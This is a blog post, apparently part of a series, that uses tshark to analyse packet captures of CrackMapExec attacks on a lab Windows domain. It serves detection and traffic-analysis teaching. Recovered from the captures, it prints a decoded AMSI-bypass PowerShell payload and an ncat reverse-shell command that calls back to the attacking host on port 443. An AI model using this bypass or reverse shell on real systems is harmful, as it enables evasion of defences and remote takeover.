193 9.550036 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
196 9.554980 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
197 9.557240 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
200 9.572289 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
201 9.574589 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
206 9.591850 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3
207 9.593175 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3
210 9.607005 10.0.0.100 → 10.0.0.105 SMB2 238 Encrypted SMB3
211 9.607508 10.0.0.105 → 10.0.0.100 SMB2 262 Encrypted SMB3
214 9.617532 10.0.0.100 → 10.0.0.105 SMB2 294 Encrypted SMB3
215 9.617975 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3
218 9.628218 10.0.0.100 → 10.0.0.105 SMB2 223 Encrypted SMB3
219 9.628717 10.0.0.105 → 10.0.0.100 SMB2 258 Encrypted SMB3
222 9.639361 10.0.0.100 → 10.0.0.105 SMB2 258 Encrypted SMB3
....
423 10.449068 10.0.0.100 → 10.0.0.105 SMB2 178 Encrypted SMB3
424 10.449465 10.0.0.105 → 10.0.0.100 SMB2 178 Encrypted SMB3
425 10.451778 10.0.0.100 → 10.0.0.105 SMB2 178 Encrypted SMB3
426 10.452430 10.0.0.105 → 10.0.0.100 TCP 60 445 → 36662 [RST, ACK] Seq=16173 Ack=14423 Win=0 Len=0
Uh Oh. From above we see that this traffic is also encrypted. This makes it difficult for our security monitoring tools to effectively do their jobs.
As the previous session was encrypted. Let's now see what we can get from the packets associated with the password policy enumeration.
Without further ado, let's take a look at the packet capture to see if we what type of traffic might be in here.
Looking at the protocol hierarchy, see some SMB and SMB2 traffic.
root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter:
eth frames:113 bytes:21694
arp frames:2 bytes:102
ip frames:111 bytes:21592
tcp frames:111 bytes:21592
nbss frames:78 bytes:19550
smb frames:4 bytes:508
smb2 frames:74 bytes:19042
===================================================================
Looking at above, I would conclude that there is no encrypted traffic. Let's see if that is true.
Peeking first into SMB traffic, we see:
root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -Y "smb"
6 3.214791 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
20 3.237020 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
34 3.279046 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
59 3.394125 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
From above, we see the SMB packets seems to all be associated with the SMB negotiate protocol request. I would assume at this point the server responded back stating that it would like to use SMB2, this is why we do not see any additional traffic.
Let's now look into the SMB2 traffic.
root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -Y "smb2"
7 3.215534 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
9 3.218110 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
10 3.218617 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
11 3.222438 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
12 3.224476 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
13 3.229892 10.0.0.100 → 10.0.0.105 SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
14 3.230867 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
15 3.234048 10.0.0.100 → 10.0.0.105 SMB2 126 Session Logoff Request
16 3.234344 10.0.0.105 → 10.0.0.100 SMB2 126 Session Logoff Response
21 3.238371 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
23 3.241025 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
24 3.241635 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
25 3.248880 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
26 3.249527 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
27 3.256058 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
28 3.258185 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
35 3.279840 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
37 3.293799 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
38 3.294739 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
39 3.298425 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
41 3.299181 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
42 3.305931 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
43 3.308715 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
44 3.313429 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3
45 3.313913 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3
.....
54 3.377248 10.0.0.100 → 10.0.0.105 SMB2 223 Encrypted SMB3
55 3.377657 10.0.0.105 → 10.0.0.100 SMB2 238 Encrypted SMB3
60 3.396247 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
62 3.400194 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
63 3.400920 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
64 3.412338 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
65 3.413306 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
67 3.434020 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
68 3.436640 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
69 3.451598 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3
77 3.522068 10.0.0.100 → 10.0.0.105 SMB2 258 Encrypted SMB3
78 3.522898 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3
......
99 3.704565 10.0.0.100 → 10.0.0.105 SMB2 223 Encrypted SMB3
100 3.704911 10.0.0.105 → 10.0.0.100 SMB2 246 Encrypted SMB3
Holy smack! Looks like yet another set of encrypted traffic. Well nothing else to see here at this time. Let's move on to see what things look like when we execute remote commands.
Let's now see what the communication looks like when crackmapexec runs a powershell command.
As always, when we first look at our pcap file, we look at the protocol hierarchy to understand what is in the file. Let's do that.
root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter:
eth frames:247 bytes:82427
arp frames:8 bytes:408
ip frames:239 bytes:82019
udp frames:4 bytes:860
ssdp frames:4 bytes:860
tcp frames:235 bytes:81159
nbss frames:121 bytes:29648
smb frames:3 bytes:381
smb2 frames:118 bytes:29267
tcp.segments frames:1 bytes:2742
dcerpc frames:31 bytes:40114
isystemactivator frames:2 bytes:1644
remunk frames:2 bytes:300
dcerpc.stub_data frames:5 bytes:21630
dcerpc.fragments frames:1 bytes:790
===================================================================
Looking at the SMB communication, we see below once again, that this is more than likely the client trying to communicatevia SMB version 1.
root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "smb"
16 43.408475 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
30 43.435753 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
42 43.463106 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
Once again let's look at the SMB2 communication.
root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "smb2"
17 43.409255 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
19 43.413105 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
20 43.413704 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
21 43.418281 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
22 43.418780 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
23 43.426458 10.0.0.100 → 10.0.0.105 SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
24 43.427636 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
25 43.432235 10.0.0.100 → 10.0.0.105 SMB2 126 Session Logoff Request
26 43.432623 10.0.0.105 → 10.0.0.100 SMB2 126 Session Logoff Response
31 43.437344 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
33 43.440996 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
34 43.441606 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
35 43.446277 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
36 43.446815 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
37 43.455948 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
38 43.458155 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
43 43.464624 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
45 43.468269 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
46 43.468962 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
49 43.473830 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
50 43.474372 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
51 43.481931 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
52 43.484388 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
....
227 47.334141 10.0.0.105 → 10.0.0.100 SMB2 234 Encrypted SMB3
228 47.338399 10.0.0.100 → 10.0.0.105 SMB2 178 Encrypted SMB3
229 47.343532 10.0.0.105 → 10.0.0.100 SMB2 178 Encrypted SMB3
So far we seen that the majority of this tools SMB communication is encrypted. Let's see if there is anything we can learn from the "dcerpc" communication.
root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "dcerpc"
70 43.594887 10.0.0.100 → 10.0.0.105 DCERPC 166 Bind: call_id: 1, Fragment: Single, 1 context items: ISystemActivator V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
71 43.595566 10.0.0.105 → 10.0.0.100 DCERPC 406 Bind_ack: call_id: 1, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
73 43.603971 10.0.0.100 → 10.0.0.105 DCERPC 524 AUTH3: call_id: 1, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
76 43.640433 10.0.0.100 → 10.0.0.105 ISystemActivator 566 RemoteCreateInstance request
77 43.645133 10.0.0.105 → 10.0.0.100 ISystemActivator 1078 RemoteCreateInstance response
81 43.682025 10.0.0.100 → 10.0.0.105 DCERPC 166 Bind: call_id: 1, Fragment: Single, 1 context items: f309ad18-d86a-11d0-a075-00c04fb68820 V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
82 43.682530 10.0.0.105 → 10.0.0.100 DCERPC 406 Bind_ack: call_id: 1, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
86 43.702770 10.0.0.100 → 10.0.0.105 DCERPC 524 AUTH3: call_id: 1, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
88 43.718458 10.0.0.100 → 10.0.0.105 DCERPC 210 Request: call_id: 2, Fragment: Single, opnum: 6, Ctx: 0 f309ad18-d86a-11d0-a075-00c04fb68820 V0
89 43.719805 10.0.0.105 → 10.0.0.100 DCERPC 294 Response: call_id: 2, Fragment: Single, Ctx: 0 f309ad18-d86a-11d0-a075-00c04fb68820 V0
90 43.727167 10.0.0.100 → 10.0.0.105 DCERPC 166 Alter_context: call_id: 3, Fragment: Single, 1 context items: IRemUnknown V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
91 43.727812 10.0.0.105 → 10.0.0.100 DCERPC 402 Alter_context_resp: call_id: 3, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
92 43.747847 10.0.0.100 → 10.0.0.105 DCERPC 524 AUTH3: call_id: 3, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
94 43.765583 10.0.0.100 → 10.0.0.105 IRemUnknown 182 RemRelease request Cnt=1 Refs=1-0
95 43.766108 10.0.0.105 → 10.0.0.100 IRemUnknown 118 RemRelease response -> S_OK
96 43.772729 10.0.0.100 → 10.0.0.105 DCERPC 166 Alter_context: call_id: 5, Fragment: Single, 1 context items: 9556dc99-828c-11cf-a37e-00aa003240c7 V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
97 43.773407 10.0.0.105 → 10.0.0.100 DCERPC 402 Alter_context_resp: call_id: 5, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
98 43.788367 10.0.0.100 → 10.0.0.105 DCERPC 524 AUTH3: call_id: 5, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
100 43.827914 10.0.0.100 → 10.0.0.105 DCERPC 226 Request: call_id: 6, Fragment: Single, opnum: 6, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
101 43.835340 10.0.0.105 → 10.0.0.100 DCERPC 4326 Response: call_id: 6, Fragment: 1st, Ctx: 2
103 43.835429 10.0.0.105 → 10.0.0.100 DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
105 43.835655 10.0.0.105 → 10.0.0.100 DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
107 43.835711 10.0.0.105 → 10.0.0.100 DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
109 43.835917 10.0.0.105 → 10.0.0.100 DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
111 43.835981 10.0.0.105 → 10.0.0.100 DCERPC 790 Response: call_id: 6, Fragment: Last, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
114 44.446346 10.0.0.100 → 10.0.0.105 DCERPC 2050 Request: call_id: 7, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
116 44.578642 10.0.0.105 → 10.0.0.100 DCERPC 1270 Response: call_id: 7, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
144 44.726719 10.0.0.100 → 10.0.0.105 DCERPC 2046 Request: call_id: 8, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
147 44.753078 10.0.0.105 → 10.0.0.100 DCERPC 1270 Response: call_id: 8, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
177 44.960333 10.0.0.100 → 10.0.0.105 DCERPC 2738 Request: call_id: 9, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
181 44.992849 10.0.0.105 → 10.0.0.100 DCERPC 1270 Response: call_id: 9, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
The above looks interesting in that there are some cleartext. Let's follow the stream to see if we see anything of interest. Please note I've edited below for brevity but just tried to keep what I believe was important.
root@securitynik:~/cme# tshark -q -n -r cme-powershell.pcap -n -z follow,tcp,ascii,10.0.0.100:37794,10.0.0.105:49666
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.100 and tcp.srcport eq 37794) and (ip.dst eq 10.0.0.105 and tcp.dstport eq 49666)) or ((ip.src eq 10.0.0.105 and tcp.srcport eq 49666) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 37794))
Node 0: 10.0.0.100:37794
Node 1: 10.0.0.105:49666
112
....5..NTLMSSP.........p...".".........@.......V.......p...........5...S.E.C.U.R.I.T.Y.N.I.K.a.d.m.i.n.i.s.t.r.a.t.o.r....T...J7..7...bOk63ZTRY........i.4.............`J9K....Ok63ZTRY........S.E.C.N.I.K.-.2.K.1.9.....S.E.C.U.R.I.T.Y.N.I.K...:.S.E.C.N.I.K.-.2.K.1.9...s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l...".s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l...".s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l.....`J9K...... .c.i.f.s./.S.E.C.N.I.K.-.2.K.1.9.........
.).yPDg...Q' S.
156
................\................@ic#..................l..9H...*..?#....c..............././.../.r.o.o.t./.c.i.m.v.2.................
.....................................................................................................q........0....M............R....__PARAMETERS..cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\Windows\Temp\kJpSGP 2>&1..C:\....C...........
....5......s.H.........
..........................................................................................................................................................................................................................................................p........0....L............Q....__PARAMETERS..cmd.exe /Q /c cd 1> \\127.0.0.1\C$\Windows\Temp\AZGdHz 2>&1..C:\.>A..........
....5.........n..[H....
..D.................object:Win32_ProcessStartup.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................$........0......................__PARAMETERS..cmd.exe /Q /c powershell.exe -exec bypass -window hidden -noni -nop -encoded WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA== 1> \\127.0.0.1\C$\Windows\Temp\RvhXCV 2>&1..C:\.FF..........
....5......hj..h$......
===================================================================
As we can see from above, we seem to have some powershell code being executed. However, we do not see any results. This is still good as at least we have something of interes at this point. Let's copy this code and decode it at the Linux command lines
root@securitynik:~/cme# echo "WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA==" | base64 --decode
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
try{
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}catch{}
get-process
From above, we an conlude that the "get-process" cmdlet was executed via powershell.
No more analysis for us to do on this pcap file via tshark.
Now that we know what a powershell command may look like when run via crackmapexec, let's take a look at the "normal" command being executed. In this case, if you remember in the
first post we executed "ncat.exe", let's see how we may be able to detect this with raw packet analysis.
As always, let's first look at the protocol hierarchy of our pcap.
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter:
eth frames:356 bytes:86187
ip frames:356 bytes:86187
tcp frames:356 bytes:86187
nbss frames:160 bytes:34441
smb frames:3 bytes:381
smb2 frames:157 bytes:34060
dcerpc frames:31 bytes:39474
isystemactivator frames:2 bytes:1644
remunk frames:2 bytes:300
dcerpc.stub_data frames:5 bytes:21630
dcerpc.fragments frames:1 bytes:790
data frames:13 bytes:989
ssl frames:14 bytes:1075
tcp.segments frames:4 bytes:256
===================================================================
Now that we have the protocol hierarchy, let's look at the TCP conversations
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z conv,tcp
================================================================================
TCP Conversations
Filter:<No Filter>
| <- | | -> | | Total | Relative | Duration |
| Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |
10.0.0.100:57950 <-> 10.0.0.105:445 86 15850 100 15434 186 31284 0.023652000 20.0220
10.0.0.105:50602 <-> 10.0.0.100:443 29 1600 28 2126 57 3726 3.366351000 32.4745
10.0.0.105:49666 <-> 10.0.0.100:43388 26 9658 23 28398 49 38056 0.145434000 19.8985
10.0.0.100:57952 <-> 10.0.0.105:445 14 2952 15 2945 29 5897 0.042055000 19.9831
10.0.0.100:57948 <-> 10.0.0.105:445 9 1638 10 1166 19 2804 0.000000000 20.0444
10.0.0.100:60342 <-> 10.0.0.105:135 7 2808 9 1612 16 4420 0.098815000 19.9435
================================================================================
If we look at the first conversation above, we see it has the most bytes (15850). However, as we look at the second conversation, we see it has the longest duration of all the conversations (3.366 seconds). While we can start with the first conversation, I will instead in the interest of time start with the second, simply because it has the longest duration.
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -Y "( tcp.port == 50602 ) && ( tcp.port == 443 )" | more
190 3.366351 10.0.0.105 → 10.0.0.100 TCP 66 50602 → 443 [SYN, ECN, CWR] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1
191 3.366379 10.0.0.100 → 10.0.0.105 TCP 66 443 → 50602 [SYN, ACK] Seq=0 Ack=1 Win=29200 Len=0 MSS=1460 SACK_PERM=1 WS=128
192 3.366597 10.0.0.105 → 10.0.0.100 TCP 60 50602 → 443 [ACK] Seq=1 Ack=1 Win=2102272 Len=0
200 3.496322 10.0.0.105 → 10.0.0.100 TCP 96 50602 → 443 [PSH, ACK] Seq=1 Ack=1 Win=2102272 Len=42
201 3.496342 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [ACK] Seq=1 Ack=43 Win=29312 Len=0
202 3.496527 10.0.0.105 → 10.0.0.100 SSL 110 Continuation Data
203 3.496533 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [ACK] Seq=1 Ack=99 Win=29312 Len=0
204 3.511061 10.0.0.105 → 10.0.0.100 TCP 60 [TCP segment of a reassembled PDU]
205 3.511078 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [ACK] Seq=1 Ack=101 Win=29312 Len=0
............
347 30.994013 10.0.0.105 → 10.0.0.100 TCP 60 [TCP segment of a reassembled PDU]
348 30.994030 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [ACK] Seq=18 Ack=545 Win=29312 Len=0
349 30.994182 10.0.0.105 → 10.0.0.100 SSL 60 Continuation Data
350 30.994188 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [ACK] Seq=18 Ack=549 Win=29312 Len=0
351 35.836894 10.0.0.100 → 10.0.0.105 TCP 59 443 → 50602 [PSH, ACK] Seq=18 Ack=549 Win=29312 Len=5
352 35.837355 10.0.0.105 → 10.0.0.100 TCP 60 50602 → 443 [PSH, ACK] Seq=549 Ack=23 Win=2102272 Len=5
353 35.837371 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [ACK] Seq=23 Ack=554 Win=29312 Len=0
354 35.840523 10.0.0.105 → 10.0.0.100 TCP 60 50602 → 443 [FIN, ACK] Seq=554 Ack=23 Win=2102272 Len=0
355 35.840639 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [FIN, ACK] Seq=23 Ack=555 Win=29312 Len=0
356 35.840840 10.0.0.105 → 10.0.0.100 TCP 60 50602 → 443 [ACK] Seq=555 Ack=24 Win=2102272 Len=0
From above, we see port 443 which suggests SSL communication. However, we see no SSL negotiation which is typically done after the 3 way handshake is completed. Considering there is no SSL negotiation, is there a possibility that we may be able to see the cleartext data? Let's reassemble the session via following the tcp stream to see what we get.
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z follow,tcp,ascii,10.0.0.105:50602,10.0.0.100:443 | more
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.105 and tcp.srcport eq 50602) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 443)) or ((ip.src eq 10.0.0.100 and tcp.srcport eq 443) and (ip.dst eq 10.0.0.105 and t
cp.dstport eq 50602))
Node 0: 10.0.0.105:50602
Node 1: 10.0.0.100:443
42
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\>
whoami
whoami
securitynik\administrator
C:\>
net users
net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest
krbtgt
nakia neysa nik
Prague
saadia
securitynik
The command completed with one or more errors.
C:\>
exit
exit
Ahhh from above we see that even though the traffic is on port 443, we can see this communication is not encrypted. Interesting!
If we go through the other conversations, we see mostly unreadable traffic. However, as we follow the stream for the conversation with "10.0.0.105:49666" and "10.0.0.100:43388", we see the following:
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z follow,tcp,ascii,10.0.0.105:49666,10.0.0.100:43388 | more
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.105 and tcp.srcport eq 49666) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 43388)) or ((ip.src eq 10.0.0.100 and tcp.srcport eq 43388) and (ip.dst eq 10.0.0.105 a
nd tcp.dstport eq 49666))
Node 0: 10.0.0.100:43388
Node 1: 10.0.0.105:49666
......
.......................f..... ..D.................object:Win32_ProcessStartup................................................................................................................
.............................................................................................................................................................................................
...........q........0....M............R....__PARAMETERS..cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\Windows\Temp\YkGcDv 2>&1..C:\....ri..........
....5.......,L....f....
.............................................................................................................................................................................................
.............................................................................................................................................................................................
...........p........0....L............Q....__PARAMETERS..cmd.exe /Q /c cd 1> \\127.0.0.1\C$\Windows\Temp\egHJIv 2>&1..C:\..I..........
....5....... h...r@....
.............................................................................................................................................................................................
....................0......................__PARAMETERS..cmd.exe /Q /c c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \\127.0.0.1\C$\Windows\Temp\vYsGjo 2>&1..C:\.Cg..........
....5..........WG......
Above we see from the rebuilt session that amongst other items, we see "ncat.exe" being executed with various arguments.
Ok. That's it for thist post.
References:
Wikipedia - ICMP protocol
Posts in this series:
Having Fun with CrackMapExec
Having Fun with CrackMapExec - Log Analysis
Having Fun with CrackMapExec - Packet Analysis - CrackMapExec
Having Fun with CrackMapExec - Zeek (Bro) Analysis
Having Fun with CrackMapExec - Snort IDS/IPS Analysis